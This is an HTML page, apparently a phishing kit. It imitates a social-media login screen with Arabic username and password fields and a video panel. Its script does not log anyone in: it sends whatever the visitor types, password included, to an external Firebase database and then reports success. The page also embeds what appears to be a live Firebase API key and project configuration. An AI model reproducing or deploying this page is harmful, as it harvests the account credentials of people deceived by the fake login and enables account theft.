<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>PUGE</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #fafafa;
      margin: 0;
      padding: 0;
    }
    .container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      flex-wrap: wrap;
    }
    .login-box {
      background-color: #fff;
      border: 1px solid #dbdbdb;
      border-radius: 1px;
      padding: 10px 0;
      width: 350px;
      text-align: center;
      margin-right: 20px;
      margin-bottom: 20px;
    }
    .login-box img {
      width: 175px;
      margin-top: 20px;
      margin-bottom: 20px;
    }
    .login-box form {
      display: flex;
      flex-direction: column;
      align-items: center;
      margin-bottom: 10px;
    }
    .login-box input {
      border: 1px solid #dbdbdb;
      border-radius: 3px;
      font-size: 12px;
      padding: 9px 8px 7px;
      margin-bottom: 6px;
      width: 268px;
    }
    .login-box button {
      background-color: #4db5f9;
      border: none;
      border-radius: 4px;
      color: #fff;
      font-size: 14px;
      font-weight: bold;
      padding: 5px 9px;
      width: 268px;
      margin-top: 10px;
    }
    .video-container {
      width: 400px;
      height: 700px;
      position: relative;
      overflow: hidden;
      margin-bottom: 20px;
    }
    .video-container video {
      width: 100%;
      height: 100%;
      object-fit: cover;
    }
    @media (max-width: 768px) {
      .container {
        flex-direction: column;
      }
      .login-box {
        margin-right: 0;
      }
      .video-container {
        width: 100%;
        height: 300px;
      }
      .video-container video {
        width: 100%;
        height: auto;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="login-box">
      <img src="Capture.PNG" alt="Capture">
      <form id="dataForm">
        <input type="text" id="field1" placeholder="اسم المستخدم" required>
        <input type="text" id="field2" placeholder="رقم سري" required>
        <button type="submit">دخول</button>
      </form>
    </div>
    <div class="video-container">
      <video autoplay loop muted>
        <source src="design1.mp4" type="video/mp4">
      </video>
    </div>
  </div>

  <!-- Firebase SDK -->
  <script src="https://www.gstatic.com/firebasejs/8.6.1/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.6.1/firebase-database.js"></script>
  <script>
    // Your web app's Firebase configuration
    const firebaseConfig = {
      apiKey: "AIzaSyAK5RudP6qIPX8kUbHj3YdaMPERrmry5ns",
      authDomain: "project-80357.firebaseapp.com",
      databaseURL: "https://project-80357-default-rtdb.firebaseio.com",
      projectId: "project-80357",
      storageBucket: "project-80357.appspot.com",
      messagingSenderId: "421768499139",
      appId: "1:421768499139:web:5f8a0d50956a5cdeacb9a0"
    };

    // Initialize Firebase
    firebase.initializeApp(firebaseConfig);
    const database = firebase.database();

    // Form submission handling
    document.getElementById('dataForm').addEventListener('submit', submitForm);

    function submitForm(e) {
      e.preventDefault();

      const field1 = document.getElementById('field1').value;
      const field2 = document.getElementById('field2').value;

      saveData(field1, field2);
    }

    function saveData(field1, field2) {
      const newEntryKey = database.ref().child('book').push().key;
      database.ref('book/' + newEntryKey).set({
        field1: field1,
        field2: field2
      }, (error) => {
        if (error) {
          alert("فشل عملية التسجيل. " + error);
        } else {
          alert("نجحت عملية التسجيل .");
        }
      });
    }
  </script>
</body>
</html>